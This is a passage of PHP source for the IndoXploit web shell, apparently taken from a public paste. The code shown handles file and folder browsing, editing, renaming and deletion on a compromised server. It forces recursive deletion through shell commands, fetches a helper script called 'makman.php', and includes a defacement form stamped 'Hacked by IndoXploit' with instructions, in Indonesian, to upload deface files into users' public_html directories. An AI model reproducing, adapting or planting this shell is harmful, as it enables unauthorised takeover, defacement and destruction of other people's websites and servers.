  1629. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by IndoXploit</textarea><br>
  1630. <input style='background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 460px; margin: 5px auto;' type='submit' name='reverse' value='Scan Fake Root!'>
  1631. </form><br>
  1632. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  1633. }
  1634. }
  1635. elseif($_GET['do'] === 'lre') {
  1636. if(file_exists("makman.php")) {
  1637. print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/makman.php' frameborder='0' scrolling='yes'></iframe>";
  1638. }
  1639. else {
  1640. if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'Makman'."));
  1641. if(getfile("LRE")) {
  1642. print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/makman.php' frameborder='0' scrolling='yes'></iframe>";
  1643. }
  1644. else {
  1645. print color(1, 1, "Error while downloading file makman.");
  1646. @unlink("makman.php");
  1647. }
  1648. }
  1649.  
  1650. }
  1651. }
  1652. elseif(isset($_GET['act'])) {
  1653. if($_GET['act'] === 'newfile') {
  1654. if($_POST['save']) {
  1655. $filename = htmlspecialchars($_POST['filename']);
  1656. $fopen = fopen($filename, "a+");
  1657. if($fopen) {
  1658. $act = "<script>window.location='?act=edit&dir=".path()."&file=".$_POST['filename']."';</script>";
  1659. }
  1660. else {
  1661. $act = color(1, 1, "Permission Denied!");
  1662. }
  1663. }
  1664. print $act;
  1665. print "<form method='post'>
  1666. Filename: <input type='text' name='filename' value='".path()."/newfile.php' style='width: 450px;' height='10'>
  1667. <input type='submit' class='input' name='save' value='SUBMIT'>
  1668. </form>";
  1669. }
  1670. elseif($_GET['act'] === 'newfolder') {
  1671. if($_POST['save']) {
  1672. $foldername = path().'/'.htmlspecialchars($_POST['foldername']);
  1673. if(!@mkdir($foldername)) {
  1674. $act = color(1, 1, "Permission Denied!");
  1675. }
  1676. else {
  1677. $act = "<script>window.location='?dir=".path()."';</script>";
  1678. }
  1679. }
  1680. print $act;
  1681. print "<form method='post'>
  1682. Folder Name: <input type='text' name='foldername' style='width: 450px;' height='10'>
  1683. <input type='submit' class='input' name='save' value='SUBMIT'>
  1684. </form>";
  1685. }
  1686. elseif($_GET['act'] === 'rename_folder') {
  1687. if($_POST['save']) {
  1688. $rename_folder = rename(path(), "".dirname(path()).DIRECTORY_SEPARATOR.htmlspecialchars($_POST['foldername']));
  1689. if($rename_folder) {
  1690. $act = "<script>window.location='?dir=".dirname(path())."';</script>";
  1691. }
  1692. else {
  1693. $act = color(1, 1, "Permission Denied!");
  1694. }
  1695. print "$act<br>";
  1696. }
  1697. print "<form method='post'>
  1698. <input type='text' value='".basename(path())."' name='foldername' style='width: 450px;' height='10'>
  1699. <input type='submit' class='input' name='save' value='RENAME'>
  1700. </form>";
  1701. }
  1702. elseif($_GET['act'] === 'delete_folder') {
  1703. if(is_dir(path())) {
  1704. if(is_writable(path())) {
  1705. @rmdir(path());
  1706. if(!@rmdir(path()) AND OS() === "Linux") @exe("rm -rf ".path());
  1707. if(!@rmdir(path()) AND OS() === "Windows") @exe("rmdir /s /q ".path());
  1708. $act = "<script>window.location='?dir=".dirname(path())."';</script>";
  1709. }
  1710. else {
  1711. $act = color(1, 1, "Could not remove directory '".basename(path())."'");
  1712. }
  1713. }
  1714. print $act;
  1715. }
  1716. elseif($_GET['act'] === 'view') {
  1717. print "Filename: ".color(1, 2, basename($_GET['file']))." [".writeable($_GET['file'], perms($_GET['file']))."]<br>";
  1718. print "[ <a href='?act=view&dir=".path()."&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=".path()."&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=".path()."&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=".path()."&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=".path()."&file=".$_GET['file']."'>delete</a> ]<br>";
  1719. print "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  1720. }
  1721. elseif($_GET['act'] === 'edit') {
  1722. if($_POST['save']) {
  1723. $save = file_put_contents($_GET['file'], $_POST['src']);
  1724. if($save) {
  1725. $act = color(1, 2, "File Saved!");
  1726. }
  1727. else {
  1728. $act = color(1, 1, "Permission Denied!");
  1729. }
  1730. print "$act<br>";
  1731. }
  1732.  
  1733. print "Filename: ".color(1, 2, basename($_GET['file']))." [".writeable($_GET['file'], perms($_GET['file']))."]<br>";
  1734. print "[ <a href='?act=view&dir=".path()."&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=".path()."&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=".path()."&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=".path()."&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=".path()."&file=".$_GET['file']."'>delete</a> ]<br>";
  1735. print "<form method='post'>
  1736. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  1737. <input type='submit' class='input' value='SAVE' name='save' style='width: 500px;'>
  1738. </form>";
  1739. }
  1740. elseif($_GET['act'] === 'rename') {
  1741. if($_POST['save']) {
  1742. $rename = rename($_GET['file'], path().DIRECTORY_SEPARATOR.htmlspecialchars($_POST['filename']));
  1743. if($rename) {
  1744. $act = "<script>window.location='?dir=".path()."';</script>";
  1745. }
  1746. else {
  1747. $act = color(1, 1, "Permission Denied!");
  1748. }
  1749. print "$act<br>";
  1750. }
  1751.  
  1752. print "Filename: ".color(1, 2, basename($_GET['file']))." [".writeable($_GET['file'], perms($_GET['file']))."]<br>";
  1753. print "[ <a href='?act=view&dir=".path()."&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=".path()."&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=".path()."&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=".path()."&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=".path()."&file=".$_GET['file']."'>delete</a> ]<br>";
  1754. print "<form method='post'>
  1755. <input type='text' value='".basename($_GET['file'])."' name='filename' style='width: 450px;' height='10'>
  1756. <input type='submit' class='input' name='save' value='RENAME'>
  1757. </form>";
  1758. }
  1759. elseif($_GET['act'] === 'delete') {
  1760. $delete = unlink($_GET['file']);
  1761. if($delete) {
  1762. $act = "<script>window.location='?dir=".path()."';</script>";
  1763. }
  1764. else {
  1765. $act = color(1, 1, "Permission Denied!");
  1766. }
  1767. print $act;
  1768. }
  1769. }
  1770. else {
  1771. files_and_folder();
  1772. }
  1773. }
  1774.  
  1775. serverinfo();
  1776. action();
  1777. ?>
  1778. </body>
  1779. </html>
Add Comment
Please, Sign In to add comment